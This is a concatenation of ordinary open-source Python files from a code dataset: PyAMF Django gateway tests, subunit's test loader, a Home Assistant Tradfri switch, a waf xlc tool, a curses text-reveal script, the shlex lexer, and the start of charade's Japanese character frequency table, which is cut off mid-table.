# -*- coding: utf-8 -*- # # Copyright (c) The PyAMF Project. # See LICENSE.txt for details. """ Django gateway tests. @since: 0.1.0 """ import unittest import sys import os try: from django import http from pyamf.remoting.gateway import django except ImportError: django = None import pyamf from pyamf import remoting, util class BaseTestCase(unittest.TestCase): """ """ def setUp(self): if not django: self.skipTest("'django' not available") class DjangoGatewayTestCase(BaseTestCase): def setUp(self): BaseTestCase.setUp(self) import new self.mod_name = '%s.%s' % (__name__, 'settings') sys.modules[self.mod_name] = new.module(self.mod_name) self.old_env = os.environ.get('DJANGO_SETTINGS_MODULE', None) os.environ['DJANGO_SETTINGS_MODULE'] = self.mod_name def tearDown(self): if self.old_env is not None: os.environ['DJANGO_SETTINGS_MODULE'] = self.old_env del sys.modules[self.mod_name] def test_csrf(self): gw = django.DjangoGateway() self.assertTrue(gw.csrf_exempt) def test_settings(self): from django import conf settings_mod = sys.modules[self.mod_name] settings_mod.DEBUG = True settings_mod.AMF_TIME_OFFSET = 1000 old_settings = conf.settings conf.settings = conf.Settings(self.mod_name) gw = django.DjangoGateway() try: self.assertTrue(gw.debug) self.assertEqual(gw.timezone_offset, 1000) finally: conf.settings = old_settings def test_request_method(self): gw = django.DjangoGateway() http_request = http.HttpRequest() http_request.method = 'GET' http_response = gw(http_request) self.assertEqual(http_response.status_code, 405) def test_bad_request(self): gw = django.DjangoGateway() request = util.BufferedByteStream() request.write('Bad request') request.seek(0, 0) http_request = http.HttpRequest() http_request.method = 'POST' http_request.raw_post_data = request.getvalue() http_response = gw(http_request) self.assertEqual(http_response.status_code, 400) def test_unknown_request(self): gw = django.DjangoGateway() request = util.BufferedByteStream() 
request.write('\x00\x00\x00\x00\x00\x01\x00\x09test.test\x00' '\x02/1\x00\x00\x00\x14\x0a\x00\x00\x00\x01\x08\x00\x00\x00\x00' '\x00\x01\x61\x02\x00\x01\x61\x00\x00\x09') request.seek(0, 0) http_request = http.HttpRequest() http_request.method = 'POST' http_request.raw_post_data = request.getvalue() http_response = gw(http_request) envelope = remoting.decode(http_response.content) message = envelope['/1'] self.assertEqual(message.status, remoting.STATUS_ERROR) body = message.body self.assertTrue(isinstance(body, remoting.ErrorFault)) self.assertEqual(body.code, 'Service.ResourceNotFound') def test_expose_request(self): http_request = http.HttpRequest() self.executed = False def test(request): self.assertEqual(http_request, request) self.assertTrue(hasattr(request, 'amf_request')) self.executed = True gw = django.DjangoGateway({'test.test': test}, expose_request=True) request = util.BufferedByteStream() request.write('\x00\x00\x00\x00\x00\x01\x00\x09test.test\x00' '\x02/1\x00\x00\x00\x05\x0a\x00\x00\x00\x00') request.seek(0, 0) http_request.method = 'POST' http_request.raw_post_data = request.getvalue() gw(http_request) self.assertTrue(self.executed) def _raiseException(self, e, *args, **kwargs): raise e() def test_really_bad_decode(self): self.old_method = remoting.decode remoting.decode = lambda *args, **kwargs: self._raiseException(Exception, *args, **kwargs) http_request = http.HttpRequest() http_request.method = 'POST' http_request.raw_post_data = '' gw = django.DjangoGateway() try: http_response = gw(http_request) except: remoting.decode = self.old_method raise remoting.decode = self.old_method self.assertTrue(isinstance(http_response, http.HttpResponseServerError)) self.assertEqual(http_response.status_code, 500) self.assertEqual(http_response.content, '500 Internal Server Error\n\nAn unexpected error occurred.') def test_expected_exceptions_decode(self): self.old_method = remoting.decode gw = django.DjangoGateway() http_request = http.HttpRequest() 
http_request.method = 'POST' http_request.raw_post_data = '' try: for x in (KeyboardInterrupt, SystemExit): remoting.decode = lambda *args, **kwargs: self._raiseException(x, *args, **kwargs) self.assertRaises(x, gw, http_request) except: remoting.decode = self.old_method raise remoting.decode = self.old_method def test_timezone(self): import datetime http_request = http.HttpRequest() self.executed = False td = datetime.timedelta(hours=-5) now = datetime.datetime.utcnow() def echo(d): self.assertEqual(d, now + td) self.executed = True return d gw = django.DjangoGateway({'test.test': echo}, timezone_offset=-18000, expose_request=False) msg = remoting.Envelope(amfVersion=pyamf.AMF0) msg['/1'] = remoting.Request(target='test.test', body=[now]) http_request.method = 'POST' http_request.raw_post_data = remoting.encode(msg).getvalue() res = remoting.decode(gw(http_request).content) self.assertTrue(self.executed) self.assertEqual(res['/1'].body, now)
gpl-2.0
devs1991/test_edx_docmode
venv/lib/python2.7/site-packages/subunit/tests/__init__.py
2
2599
# # subunit: extensions to python unittest to get test results from subprocesses. # Copyright (C) 2005 Robert Collins <robertc@robertcollins.net> # # Licensed under either the Apache License, Version 2.0 or the BSD 3-clause # license at the users choice. A copy of both licenses are available in the # project source as Apache-2.0 and BSD. You may not use this file except in # compliance with one of these two licences. # # Unless required by applicable law or agreed to in writing, software # distributed under these licenses is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # license you chose for the specific language governing permissions and # limitations under that license. # import sys from unittest import TestLoader # Before the test module imports to avoid circularity. # For testing: different pythons have different str() implementations. if sys.version_info > (3, 0): _remote_exception_repr = "testtools.testresult.real._StringException" _remote_exception_str = "Traceback (most recent call last):\ntesttools.testresult.real._StringException" _remote_exception_str_chunked = "57\r\n" + _remote_exception_str + ": boo qux\n0\r\n" else: _remote_exception_repr = "_StringException" _remote_exception_str = "Traceback (most recent call last):\n_StringException" _remote_exception_str_chunked = "3D\r\n" + _remote_exception_str + ": boo qux\n0\r\n" from subunit.tests import ( test_chunked, test_details, test_filters, test_progress_model, test_run, test_subunit_filter, test_subunit_stats, test_subunit_tags, test_tap2subunit, test_test_protocol, test_test_protocol2, test_test_results, ) def test_suite(): loader = TestLoader() result = loader.loadTestsFromModule(test_chunked) result.addTest(loader.loadTestsFromModule(test_details)) result.addTest(loader.loadTestsFromModule(test_filters)) result.addTest(loader.loadTestsFromModule(test_progress_model)) 
result.addTest(loader.loadTestsFromModule(test_test_results)) result.addTest(loader.loadTestsFromModule(test_test_protocol)) result.addTest(loader.loadTestsFromModule(test_test_protocol2)) result.addTest(loader.loadTestsFromModule(test_tap2subunit)) result.addTest(loader.loadTestsFromModule(test_subunit_filter)) result.addTest(loader.loadTestsFromModule(test_subunit_tags)) result.addTest(loader.loadTestsFromModule(test_subunit_stats)) result.addTest(loader.loadTestsFromModule(test_run)) return result
agpl-3.0
Teagan42/home-assistant
homeassistant/components/tradfri/switch.py
4
1789
"""Support for IKEA Tradfri switches.""" from homeassistant.components.switch import SwitchDevice from .base_class import TradfriBaseDevice from .const import CONF_GATEWAY_ID, KEY_API, KEY_GATEWAY async def async_setup_entry(hass, config_entry, async_add_entities): """Load Tradfri switches based on a config entry.""" gateway_id = config_entry.data[CONF_GATEWAY_ID] api = hass.data[KEY_API][config_entry.entry_id] gateway = hass.data[KEY_GATEWAY][config_entry.entry_id] devices_commands = await api(gateway.get_devices()) devices = await api(devices_commands) switches = [dev for dev in devices if dev.has_socket_control] if switches: async_add_entities( TradfriSwitch(switch, api, gateway_id) for switch in switches ) class TradfriSwitch(TradfriBaseDevice, SwitchDevice): """The platform class required by Home Assistant.""" def __init__(self, device, api, gateway_id): """Initialize a switch.""" super().__init__(device, api, gateway_id) self._unique_id = f"{gateway_id}-{device.id}" def _refresh(self, device): """Refresh the switch data.""" super()._refresh(device) # Caching of switch control and switch object self._device_control = device.socket_control self._device_data = device.socket_control.sockets[0] @property def is_on(self): """Return true if switch is on.""" return self._device_data.state async def async_turn_off(self, **kwargs): """Instruct the switch to turn off.""" await self._api(self._device_control.set_state(False)) async def async_turn_on(self, **kwargs): """Instruct the switch to turn on.""" await self._api(self._device_control.set_state(True))
apache-2.0
ThomasFeher/audacity
lib-src/lv2/lilv/waflib/Tools/xlc.py
330
1175
#! /usr/bin/env python # encoding: utf-8 # WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file from waflib.Tools import ccroot,ar from waflib.Configure import conf @conf def find_xlc(conf): cc=conf.find_program(['xlc_r','xlc'],var='CC') cc=conf.cmd_to_list(cc) conf.get_xlc_version(cc) conf.env.CC_NAME='xlc' conf.env.CC=cc @conf def xlc_common_flags(conf): v=conf.env v['CC_SRC_F']=[] v['CC_TGT_F']=['-c','-o'] if not v['LINK_CC']:v['LINK_CC']=v['CC'] v['CCLNK_SRC_F']=[] v['CCLNK_TGT_F']=['-o'] v['CPPPATH_ST']='-I%s' v['DEFINES_ST']='-D%s' v['LIB_ST']='-l%s' v['LIBPATH_ST']='-L%s' v['STLIB_ST']='-l%s' v['STLIBPATH_ST']='-L%s' v['RPATH_ST']='-Wl,-rpath,%s' v['SONAME_ST']=[] v['SHLIB_MARKER']=[] v['STLIB_MARKER']=[] v['LINKFLAGS_cprogram']=['-Wl,-brtl'] v['cprogram_PATTERN']='%s' v['CFLAGS_cshlib']=['-fPIC'] v['LINKFLAGS_cshlib']=['-G','-Wl,-brtl,-bexpfull'] v['cshlib_PATTERN']='lib%s.so' v['LINKFLAGS_cstlib']=[] v['cstlib_PATTERN']='lib%s.a' def configure(conf): conf.find_xlc() conf.find_ar() conf.xlc_common_flags() conf.cc_load_tools() conf.cc_add_flags() conf.link_add_flags()
gpl-2.0
jtwaleson/decrypt
decrypt/decrypt.py
1
1745
#!/usr/bin/env python import curses import time import fileinput import random import string screen = curses.initscr() lines = [] chance = 0.1 confirmed_per_line = [] def main(): curses.noecho() try: curses.curs_set(0) except: pass screen.keypad(1) try: for line in fileinput.input(): confirmed_per_line.append([]) lines.append(line.rstrip()) iterate() fileinput.close() while iterate(increase=True): pass time.sleep(2) except KeyboardInterrupt: pass finally: curses.endwin() for line in lines: print(line) def iterate(increase=False): global chance, confirmed_per_line, lines still_random = 0 if increase: chance += 0.01 screen.erase() (y, x) = screen.getmaxyx() final_line = len(lines) if final_line > y: first_line = final_line - y else: first_line = 0 for line_num in range(first_line, final_line): line = lines[line_num] for col in range(min(x, len(line))): try: if col not in confirmed_per_line[line_num]: still_random += 1 if random.random() < chance: confirmed_per_line[line_num].append(col) screen.addch(line_num - first_line, col, random.choice(string.punctuation), curses.A_REVERSE) else: screen.addstr(line_num - first_line, col, line[col]) except: pass screen.refresh() time.sleep(0.1) return still_random > 0
mit
unindented/streamcode
client/static/jsrepl/extern/python/unclosured/lib/python2.7/shlex.py
306
11137
# -*- coding: iso-8859-1 -*- """A lexical analyzer class for simple shell-like syntaxes.""" # Module and documentation by Eric S. Raymond, 21 Dec 1998 # Input stacking and error message cleanup added by ESR, March 2000 # push_source() and pop_source() made explicit by ESR, January 2001. # Posix compliance, split(), string arguments, and # iterator interface by Gustavo Niemeyer, April 2003. import os.path import sys from collections import deque try: from cStringIO import StringIO except ImportError: from StringIO import StringIO __all__ = ["shlex", "split"] class shlex: "A lexical analyzer class for simple shell-like syntaxes." def __init__(self, instream=None, infile=None, posix=False): if isinstance(instream, basestring): instream = StringIO(instream) if instream is not None: self.instream = instream self.infile = infile else: self.instream = sys.stdin self.infile = None self.posix = posix if posix: self.eof = None else: self.eof = '' self.commenters = '#' self.wordchars = ('abcdfeghijklmnopqrstuvwxyz' 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_') if self.posix: self.wordchars += ('ßàáâãäåæçèéêëìíîïðñòóôõöøùúûüýþÿ' 'ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖØÙÚÛÜÝÞ') self.whitespace = ' \t\r\n' self.whitespace_split = False self.quotes = '\'"' self.escape = '\\' self.escapedquotes = '"' self.state = ' ' self.pushback = deque() self.lineno = 1 self.debug = 0 self.token = '' self.filestack = deque() self.source = None if self.debug: print 'shlex: reading from %s, line %d' \ % (self.instream, self.lineno) def push_token(self, tok): "Push a token onto the stack popped by the get_token method" if self.debug >= 1: print "shlex: pushing token " + repr(tok) self.pushback.appendleft(tok) def push_source(self, newstream, newfile=None): "Push an input source onto the lexer's input source stack." 
if isinstance(newstream, basestring): newstream = StringIO(newstream) self.filestack.appendleft((self.infile, self.instream, self.lineno)) self.infile = newfile self.instream = newstream self.lineno = 1 if self.debug: if newfile is not None: print 'shlex: pushing to file %s' % (self.infile,) else: print 'shlex: pushing to stream %s' % (self.instream,) def pop_source(self): "Pop the input source stack." self.instream.close() (self.infile, self.instream, self.lineno) = self.filestack.popleft() if self.debug: print 'shlex: popping to %s, line %d' \ % (self.instream, self.lineno) self.state = ' ' def get_token(self): "Get a token from the input stream (or from stack if it's nonempty)" if self.pushback: tok = self.pushback.popleft() if self.debug >= 1: print "shlex: popping token " + repr(tok) return tok # No pushback. Get a token. raw = self.read_token() # Handle inclusions if self.source is not None: while raw == self.source: spec = self.sourcehook(self.read_token()) if spec: (newfile, newstream) = spec self.push_source(newstream, newfile) raw = self.get_token() # Maybe we got EOF instead? 
while raw == self.eof: if not self.filestack: return self.eof else: self.pop_source() raw = self.get_token() # Neither inclusion nor EOF if self.debug >= 1: if raw != self.eof: print "shlex: token=" + repr(raw) else: print "shlex: token=EOF" return raw def read_token(self): quoted = False escapedstate = ' ' while True: nextchar = self.instream.read(1) if nextchar == '\n': self.lineno = self.lineno + 1 if self.debug >= 3: print "shlex: in state", repr(self.state), \ "I see character:", repr(nextchar) if self.state is None: self.token = '' # past end of file break elif self.state == ' ': if not nextchar: self.state = None # end of file break elif nextchar in self.whitespace: if self.debug >= 2: print "shlex: I see whitespace in whitespace state" if self.token or (self.posix and quoted): break # emit current token else: continue elif nextchar in self.commenters: self.instream.readline() self.lineno = self.lineno + 1 elif self.posix and nextchar in self.escape: escapedstate = 'a' self.state = nextchar elif nextchar in self.wordchars: self.token = nextchar self.state = 'a' elif nextchar in self.quotes: if not self.posix: self.token = nextchar self.state = nextchar elif self.whitespace_split: self.token = nextchar self.state = 'a' else: self.token = nextchar if self.token or (self.posix and quoted): break # emit current token else: continue elif self.state in self.quotes: quoted = True if not nextchar: # end of file if self.debug >= 2: print "shlex: I see EOF in quotes state" # XXX what error should be raised here? 
raise ValueError, "No closing quotation" if nextchar == self.state: if not self.posix: self.token = self.token + nextchar self.state = ' ' break else: self.state = 'a' elif self.posix and nextchar in self.escape and \ self.state in self.escapedquotes: escapedstate = self.state self.state = nextchar else: self.token = self.token + nextchar elif self.state in self.escape: if not nextchar: # end of file if self.debug >= 2: print "shlex: I see EOF in escape state" # XXX what error should be raised here? raise ValueError, "No escaped character" # In posix shells, only the quote itself or the escape # character may be escaped within quotes. if escapedstate in self.quotes and \ nextchar != self.state and nextchar != escapedstate: self.token = self.token + self.state self.token = self.token + nextchar self.state = escapedstate elif self.state == 'a': if not nextchar: self.state = None # end of file break elif nextchar in self.whitespace: if self.debug >= 2: print "shlex: I see whitespace in word state" self.state = ' ' if self.token or (self.posix and quoted): break # emit current token else: continue elif nextchar in self.commenters: self.instream.readline() self.lineno = self.lineno + 1 if self.posix: self.state = ' ' if self.token or (self.posix and quoted): break # emit current token else: continue elif self.posix and nextchar in self.quotes: self.state = nextchar elif self.posix and nextchar in self.escape: escapedstate = 'a' self.state = nextchar elif nextchar in self.wordchars or nextchar in self.quotes \ or self.whitespace_split: self.token = self.token + nextchar else: self.pushback.appendleft(nextchar) if self.debug >= 2: print "shlex: I see punctuation in word state" self.state = ' ' if self.token: break # emit current token else: continue result = self.token self.token = '' if self.posix and not quoted and result == '': result = None if self.debug > 1: if result: print "shlex: raw token=" + repr(result) else: print "shlex: raw token=EOF" return result def 
sourcehook(self, newfile): "Hook called on a filename to be sourced." if newfile[0] == '"': newfile = newfile[1:-1] # This implements cpp-like semantics for relative-path inclusion. if isinstance(self.infile, basestring) and not os.path.isabs(newfile): newfile = os.path.join(os.path.dirname(self.infile), newfile) return (newfile, open(newfile, "r")) def error_leader(self, infile=None, lineno=None): "Emit a C-compiler-like, Emacs-friendly error-message leader." if infile is None: infile = self.infile if lineno is None: lineno = self.lineno return "\"%s\", line %d: " % (infile, lineno) def __iter__(self): return self def next(self): token = self.get_token() if token == self.eof: raise StopIteration return token def split(s, comments=False, posix=True): lex = shlex(s, posix=posix) lex.whitespace_split = True if not comments: lex.commenters = '' return list(lex) if __name__ == '__main__': if len(sys.argv) == 1: lexer = shlex() else: file = sys.argv[1] lexer = shlex(open(file), file) while 1: tt = lexer.get_token() if tt: print "Token: " + repr(tt) else: break
mit
SMALLplayer/smallplayer-image-creator
storage/.xbmc/addons/script.module.requests/lib/requests/packages/charade/jpcntx.py
151
19323
######################## BEGIN LICENSE BLOCK ######################## # The Original Code is Mozilla Communicator client code. # # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 1998 # the Initial Developer. All Rights Reserved. # # Contributor(s): # Mark Pilgrim - port to Python # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### from .compat import wrap_ord NUM_OF_CATEGORY = 6 DONT_KNOW = -1 ENOUGH_REL_THRESHOLD = 100 MAX_REL_THRESHOLD = 1000 MINIMUM_DATA_THRESHOLD = 4 # This is hiragana 2-char sequence table, the number in each cell represents its frequency category jp2CharContext = ( (0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1), (2,4,0,4,0,3,0,4,0,3,4,4,4,2,4,3,3,4,3,2,3,3,4,2,3,3,3,2,4,1,4,3,3,1,5,4,3,4,3,4,3,5,3,0,3,5,4,2,0,3,1,0,3,3,0,3,3,0,1,1,0,4,3,0,3,3,0,4,0,2,0,3,5,5,5,5,4,0,4,1,0,3,4), (0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2), 
(0,4,0,5,0,5,0,4,0,4,5,4,4,3,5,3,5,1,5,3,4,3,4,4,3,4,3,3,4,3,5,4,4,3,5,5,3,5,5,5,3,5,5,3,4,5,5,3,1,3,2,0,3,4,0,4,2,0,4,2,1,5,3,2,3,5,0,4,0,2,0,5,4,4,5,4,5,0,4,0,0,4,4), (0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), (0,3,0,4,0,3,0,3,0,4,5,4,3,3,3,3,4,3,5,4,4,3,5,4,4,3,4,3,4,4,4,4,5,3,4,4,3,4,5,5,4,5,5,1,4,5,4,3,0,3,3,1,3,3,0,4,4,0,3,3,1,5,3,3,3,5,0,4,0,3,0,4,4,3,4,3,3,0,4,1,1,3,4), (0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), (0,4,0,3,0,3,0,4,0,3,4,4,3,2,2,1,2,1,3,1,3,3,3,3,3,4,3,1,3,3,5,3,3,0,4,3,0,5,4,3,3,5,4,4,3,4,4,5,0,1,2,0,1,2,0,2,2,0,1,0,0,5,2,2,1,4,0,3,0,1,0,4,4,3,5,4,3,0,2,1,0,4,3), (0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), (0,3,0,5,0,4,0,2,1,4,4,2,4,1,4,2,4,2,4,3,3,3,4,3,3,3,3,1,4,2,3,3,3,1,4,4,1,1,1,4,3,3,2,0,2,4,3,2,0,3,3,0,3,1,1,0,0,0,3,3,0,4,2,2,3,4,0,4,0,3,0,4,4,5,3,4,4,0,3,0,0,1,4), (1,4,0,4,0,4,0,4,0,3,5,4,4,3,4,3,5,4,3,3,4,3,5,4,4,4,4,3,4,2,4,3,3,1,5,4,3,2,4,5,4,5,5,4,4,5,4,4,0,3,2,2,3,3,0,4,3,1,3,2,1,4,3,3,4,5,0,3,0,2,0,4,5,5,4,5,4,0,4,0,0,5,4), (0,5,0,5,0,4,0,3,0,4,4,3,4,3,3,3,4,0,4,4,4,3,4,3,4,3,3,1,4,2,4,3,4,0,5,4,1,4,5,4,4,5,3,2,4,3,4,3,2,4,1,3,3,3,2,3,2,0,4,3,3,4,3,3,3,4,0,4,0,3,0,4,5,4,4,4,3,0,4,1,0,1,3), (0,3,1,4,0,3,0,2,0,3,4,4,3,1,4,2,3,3,4,3,4,3,4,3,4,4,3,2,3,1,5,4,4,1,4,4,3,5,4,4,3,5,5,4,3,4,4,3,1,2,3,1,2,2,0,3,2,0,3,1,0,5,3,3,3,4,3,3,3,3,4,4,4,4,5,4,2,0,3,3,2,4,3), (0,2,0,3,0,1,0,1,0,0,3,2,0,0,2,0,1,0,2,1,3,3,3,1,2,3,1,0,1,0,4,2,1,1,3,3,0,4,3,3,1,4,3,3,0,3,3,2,0,0,0,0,1,0,0,2,0,0,0,0,0,4,1,0,2,3,2,2,2,1,3,3,3,4,4,3,2,0,3,1,0,3,3), 
(0,4,0,4,0,3,0,3,0,4,4,4,3,3,3,3,3,3,4,3,4,2,4,3,4,3,3,2,4,3,4,5,4,1,4,5,3,5,4,5,3,5,4,0,3,5,5,3,1,3,3,2,2,3,0,3,4,1,3,3,2,4,3,3,3,4,0,4,0,3,0,4,5,4,4,5,3,0,4,1,0,3,4), (0,2,0,3,0,3,0,0,0,2,2,2,1,0,1,0,0,0,3,0,3,0,3,0,1,3,1,0,3,1,3,3,3,1,3,3,3,0,1,3,1,3,4,0,0,3,1,1,0,3,2,0,0,0,0,1,3,0,1,0,0,3,3,2,0,3,0,0,0,0,0,3,4,3,4,3,3,0,3,0,0,2,3), (2,3,0,3,0,2,0,1,0,3,3,4,3,1,3,1,1,1,3,1,4,3,4,3,3,3,0,0,3,1,5,4,3,1,4,3,2,5,5,4,4,4,4,3,3,4,4,4,0,2,1,1,3,2,0,1,2,0,0,1,0,4,1,3,3,3,0,3,0,1,0,4,4,4,5,5,3,0,2,0,0,4,4), (0,2,0,1,0,3,1,3,0,2,3,3,3,0,3,1,0,0,3,0,3,2,3,1,3,2,1,1,0,0,4,2,1,0,2,3,1,4,3,2,0,4,4,3,1,3,1,3,0,1,0,0,1,0,0,0,1,0,0,0,0,4,1,1,1,2,0,3,0,0,0,3,4,2,4,3,2,0,1,0,0,3,3), (0,1,0,4,0,5,0,4,0,2,4,4,2,3,3,2,3,3,5,3,3,3,4,3,4,2,3,0,4,3,3,3,4,1,4,3,2,1,5,5,3,4,5,1,3,5,4,2,0,3,3,0,1,3,0,4,2,0,1,3,1,4,3,3,3,3,0,3,0,1,0,3,4,4,4,5,5,0,3,0,1,4,5), (0,2,0,3,0,3,0,0,0,2,3,1,3,0,4,0,1,1,3,0,3,4,3,2,3,1,0,3,3,2,3,1,3,0,2,3,0,2,1,4,1,2,2,0,0,3,3,0,0,2,0,0,0,1,0,0,0,0,2,2,0,3,2,1,3,3,0,2,0,2,0,0,3,3,1,2,4,0,3,0,2,2,3), (2,4,0,5,0,4,0,4,0,2,4,4,4,3,4,3,3,3,1,2,4,3,4,3,4,4,5,0,3,3,3,3,2,0,4,3,1,4,3,4,1,4,4,3,3,4,4,3,1,2,3,0,4,2,0,4,1,0,3,3,0,4,3,3,3,4,0,4,0,2,0,3,5,3,4,5,2,0,3,0,0,4,5), (0,3,0,4,0,1,0,1,0,1,3,2,2,1,3,0,3,0,2,0,2,0,3,0,2,0,0,0,1,0,1,1,0,0,3,1,0,0,0,4,0,3,1,0,2,1,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,4,2,2,3,1,0,3,0,0,0,1,4,4,4,3,0,0,4,0,0,1,4), (1,4,1,5,0,3,0,3,0,4,5,4,4,3,5,3,3,4,4,3,4,1,3,3,3,3,2,1,4,1,5,4,3,1,4,4,3,5,4,4,3,5,4,3,3,4,4,4,0,3,3,1,2,3,0,3,1,0,3,3,0,5,4,4,4,4,4,4,3,3,5,4,4,3,3,5,4,0,3,2,0,4,4), (0,2,0,3,0,1,0,0,0,1,3,3,3,2,4,1,3,0,3,1,3,0,2,2,1,1,0,0,2,0,4,3,1,0,4,3,0,4,4,4,1,4,3,1,1,3,3,1,0,2,0,0,1,3,0,0,0,0,2,0,0,4,3,2,4,3,5,4,3,3,3,4,3,3,4,3,3,0,2,1,0,3,3), (0,2,0,4,0,3,0,2,0,2,5,5,3,4,4,4,4,1,4,3,3,0,4,3,4,3,1,3,3,2,4,3,0,3,4,3,0,3,4,4,2,4,4,0,4,5,3,3,2,2,1,1,1,2,0,1,5,0,3,3,2,4,3,3,3,4,0,3,0,2,0,4,4,3,5,5,0,0,3,0,2,3,3), 
(0,3,0,4,0,3,0,1,0,3,4,3,3,1,3,3,3,0,3,1,3,0,4,3,3,1,1,0,3,0,3,3,0,0,4,4,0,1,5,4,3,3,5,0,3,3,4,3,0,2,0,1,1,1,0,1,3,0,1,2,1,3,3,2,3,3,0,3,0,1,0,1,3,3,4,4,1,0,1,2,2,1,3), (0,1,0,4,0,4,0,3,0,1,3,3,3,2,3,1,1,0,3,0,3,3,4,3,2,4,2,0,1,0,4,3,2,0,4,3,0,5,3,3,2,4,4,4,3,3,3,4,0,1,3,0,0,1,0,0,1,0,0,0,0,4,2,3,3,3,0,3,0,0,0,4,4,4,5,3,2,0,3,3,0,3,5), (0,2,0,3,0,0,0,3,0,1,3,0,2,0,0,0,1,0,3,1,1,3,3,0,0,3,0,0,3,0,2,3,1,0,3,1,0,3,3,2,0,4,2,2,0,2,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,2,1,2,0,1,0,1,0,0,0,1,3,1,2,0,0,0,1,0,0,1,4), (0,3,0,3,0,5,0,1,0,2,4,3,1,3,3,2,1,1,5,2,1,0,5,1,2,0,0,0,3,3,2,2,3,2,4,3,0,0,3,3,1,3,3,0,2,5,3,4,0,3,3,0,1,2,0,2,2,0,3,2,0,2,2,3,3,3,0,2,0,1,0,3,4,4,2,5,4,0,3,0,0,3,5), (0,3,0,3,0,3,0,1,0,3,3,3,3,0,3,0,2,0,2,1,1,0,2,0,1,0,0,0,2,1,0,0,1,0,3,2,0,0,3,3,1,2,3,1,0,3,3,0,0,1,0,0,0,0,0,2,0,0,0,0,0,2,3,1,2,3,0,3,0,1,0,3,2,1,0,4,3,0,1,1,0,3,3), (0,4,0,5,0,3,0,3,0,4,5,5,4,3,5,3,4,3,5,3,3,2,5,3,4,4,4,3,4,3,4,5,5,3,4,4,3,4,4,5,4,4,4,3,4,5,5,4,2,3,4,2,3,4,0,3,3,1,4,3,2,4,3,3,5,5,0,3,0,3,0,5,5,5,5,4,4,0,4,0,1,4,4), (0,4,0,4,0,3,0,3,0,3,5,4,4,2,3,2,5,1,3,2,5,1,4,2,3,2,3,3,4,3,3,3,3,2,5,4,1,3,3,5,3,4,4,0,4,4,3,1,1,3,1,0,2,3,0,2,3,0,3,0,0,4,3,1,3,4,0,3,0,2,0,4,4,4,3,4,5,0,4,0,0,3,4), (0,3,0,3,0,3,1,2,0,3,4,4,3,3,3,0,2,2,4,3,3,1,3,3,3,1,1,0,3,1,4,3,2,3,4,4,2,4,4,4,3,4,4,3,2,4,4,3,1,3,3,1,3,3,0,4,1,0,2,2,1,4,3,2,3,3,5,4,3,3,5,4,4,3,3,0,4,0,3,2,2,4,4), (0,2,0,1,0,0,0,0,0,1,2,1,3,0,0,0,0,0,2,0,1,2,1,0,0,1,0,0,0,0,3,0,0,1,0,1,1,3,1,0,0,0,1,1,0,1,1,0,0,0,0,0,2,0,0,0,0,0,0,0,0,1,1,2,2,0,3,4,0,0,0,1,1,0,0,1,0,0,0,0,0,1,1), (0,1,0,0,0,1,0,0,0,0,4,0,4,1,4,0,3,0,4,0,3,0,4,0,3,0,3,0,4,1,5,1,4,0,0,3,0,5,0,5,2,0,1,0,0,0,2,1,4,0,1,3,0,0,3,0,0,3,1,1,4,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0), (1,4,0,5,0,3,0,2,0,3,5,4,4,3,4,3,5,3,4,3,3,0,4,3,3,3,3,3,3,2,4,4,3,1,3,4,4,5,4,4,3,4,4,1,3,5,4,3,3,3,1,2,2,3,3,1,3,1,3,3,3,5,3,3,4,5,0,3,0,3,0,3,4,3,4,4,3,0,3,0,2,4,3), 
